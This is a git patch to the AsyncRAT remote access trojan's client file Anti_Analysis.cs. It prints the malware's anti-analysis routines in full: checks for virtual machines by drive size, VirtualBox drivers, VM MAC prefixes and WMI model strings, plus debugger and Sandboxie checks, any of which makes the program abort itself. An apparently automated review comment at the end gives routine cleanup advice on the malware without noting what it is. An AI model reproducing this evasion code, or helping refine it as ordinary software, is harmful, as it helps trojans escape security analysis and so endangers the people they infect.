From 34c8a05752398e8b877223333e0c4711eb28579e Mon Sep 17 00:00:00 2001
From: MrDevBot
Date: Tue, 21 May 2019 19:35:37 +1000
Subject: [PATCH] Commented out Unimplemented methods
Will probably add these methods at a later date once they have been updated to work with this version
---
 AsyncRAT-C#/Client/Helper/Anti_Analysis.cs | 236 ++++++++++-----------
 1 file changed, 118 insertions(+), 118 deletions(-)
diff --git a/AsyncRAT-C#/Client/Helper/Anti_Analysis.cs b/AsyncRAT-C#/Client/Helper/Anti_Analysis.cs
index 6cb7520..076a687 100644
--- a/AsyncRAT-C#/Client/Helper/Anti_Analysis.cs
+++ b/AsyncRAT-C#/Client/Helper/Anti_Analysis.cs
@@ -1,7 +1,7 @@
-using System;
-using System.Diagnostics;
+using System;
+using System.Diagnostics;
 using System.Linq;
-using System.Management;
+using System.Management;
 using System.Net.NetworkInformation;
 using System.Runtime.InteropServices;
@@ -12,125 +12,125 @@ using System.Runtime.InteropServices; // This program is distributed for educational purposes only. - - -namespace Client.Helper -{ - - class Anti_Analysis + + +namespace Client.Helper +{ + + class Anti_Analysis { - private static long GB_50 = 50000000000; - public static void RunAntiAnalysis() - { - if (DetectVirtualMachine() || DetectDebugger() || DetectSandboxie()) - Environment.FailFast(null); + private static long GB_50 = 50000000000; + public static void RunAntiAnalysis() + { + if (DetectVirtualMachine() || DetectDebugger() || DetectSandboxie()) + Environment.FailFast(null); } - internal static bool SmallHDD() - { - - // Method One - main drive smaller than 50gb, likely a VM - long driveSize = Methods.GetMainDriveSize(); - if (driveSize <= GB_50 * 2) - return true; - - // Method Two - has common card of virtual machine - if (HasVMCard()) - return true; - - // Method Three - checks for vm drivers - if (HasVBOXDriver()) - return true; - - // Method Four - if machine has been on for less than 5 mins - if (GetUptime() < TimeSpan.FromMinutes(5)) + internal static bool SmallHDD() + { + + // Method One - main drive smaller than 50gb, likely a VM + long driveSize = Methods.GetMainDriveSize(); + if (driveSize <= GB_50 * 2) return true; + // Method Two - has common card of virtual machine + //if (HasVMCard()) + //return true; + + // Method Three - checks for vm drivers + if (HasVBOXDriver()) + return true; + + // Method Four - if machine has been on for less than 5 mins + //if (GetUptime() < TimeSpan.FromMinutes(5)) + //return true; + // Method Five - has VM mac address - if (HasVMMac()) - return true; - - return false; + if (HasVMMac()) + return true; + + return false; } - private static bool HasVMMac() - { - var macAddr = - ( - from nic in NetworkInterface.GetAllNetworkInterfaces() - where nic.OperationalStatus == OperationalStatus.Up - select nic.GetPhysicalAddress().ToString() - ).FirstOrDefault(); - - var macs = new[] - { - "00-05-69", - 
"00:05:69", - "000569", - "00-50-56", - "00:50:56", - "005056", - "00-0C-29", - "00:0C:29", - "000C29", - "00-1C-14", - "00:1C:14", - "001C14", - "08-00-27", - "08:00:27", - "080027", - }; - foreach (string mac in macs) - { - if (mac == macAddr) - return true; - } - return false; - } - - - - - private static bool DetectVirtualMachine() - { - using (var searcher = new ManagementObjectSearcher("Select * from Win32_ComputerSystem")) - { - using (var items = searcher.Get()) - { - foreach (var item in items) - { - string manufacturer = item["Manufacturer"].ToString().ToLower(); - if ((manufacturer == "microsoft corporation" && item["Model"].ToString().ToUpperInvariant().Contains("VIRTUAL")) - || manufacturer.Contains("vmware") - || item["Model"].ToString() == "VirtualBox") - { - return true; - } - } - } - } - return false; - } - - private static bool DetectDebugger() - { - bool isDebuggerPresent = false; - CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref isDebuggerPresent); - return isDebuggerPresent; - } - - private static bool DetectSandboxie() - { - if (GetModuleHandle("SbieDll.dll").ToInt32() != 0) - return true; - else - return false; - } - - - [DllImport("kernel32.dll")] - public static extern IntPtr GetModuleHandle(string lpModuleName); - - [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] - static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess, ref bool isDebuggerPresent); - } -} + private static bool HasVMMac() + { + var macAddr = + ( + from nic in NetworkInterface.GetAllNetworkInterfaces() + where nic.OperationalStatus == OperationalStatus.Up + select nic.GetPhysicalAddress().ToString() + ).FirstOrDefault(); + + var macs = new[] + { + "00-05-69", + "00:05:69", + "000569", + "00-50-56", + "00:50:56", + "005056", + "00-0C-29", + "00:0C:29", + "000C29", + "00-1C-14", + "00:1C:14", + "001C14", + "08-00-27", + "08:00:27", + "080027", + }; + foreach (string mac in macs) + { + if (mac == macAddr) + return true; + } + 
return false; + } + + + + + private static bool DetectVirtualMachine() + { + using (var searcher = new ManagementObjectSearcher("Select * from Win32_ComputerSystem")) + { + using (var items = searcher.Get()) + { + foreach (var item in items) + { + string manufacturer = item["Manufacturer"].ToString().ToLower(); + if ((manufacturer == "microsoft corporation" && item["Model"].ToString().ToUpperInvariant().Contains("VIRTUAL")) + || manufacturer.Contains("vmware") + || item["Model"].ToString() == "VirtualBox") + { + return true; + } + } + } + } + return false; + } + + private static bool DetectDebugger() + { + bool isDebuggerPresent = false; + CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref isDebuggerPresent); + return isDebuggerPresent; + } + + private static bool DetectSandboxie() + { + if (GetModuleHandle("SbieDll.dll").ToInt32() != 0) + return true; + else + return false; + } + + + [DllImport("kernel32.dll")] + public static extern IntPtr GetModuleHandle(string lpModuleName); + + [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] + static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess, ref bool isDebuggerPresent); + } +}
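Review bot: The actual change in this hunk — disabling the `HasVMCard()` and `GetUptime()` branches inside `SmallHDD()` — is buried under a whole-file rewrite in which every line is removed and re-added (118/118), which looks like line-ending or indentation normalization rather than a code change and makes the real diff unreviewable. Commit that normalization separately, or add a `.gitattributes` rule such as `*.cs text eol=crlf` so the working tree stops flipping, and the two-check change shrinks to a handful of lines. Leaving the disabled calls as `//if (HasVMCard())` and `//if (GetUptime() < TimeSpan.FromMinutes(5))` keeps dead code that refers to methods not defined anywhere in this file; since the commit message already says they are unimplemented, delete those lines and track the work in an issue rather than commenting them out. If they must stay, replace the bare `//` prefixes with a comment that explains the state, e.g. `// TODO: HasVMCard()/GetUptime() removed until ported to this version`.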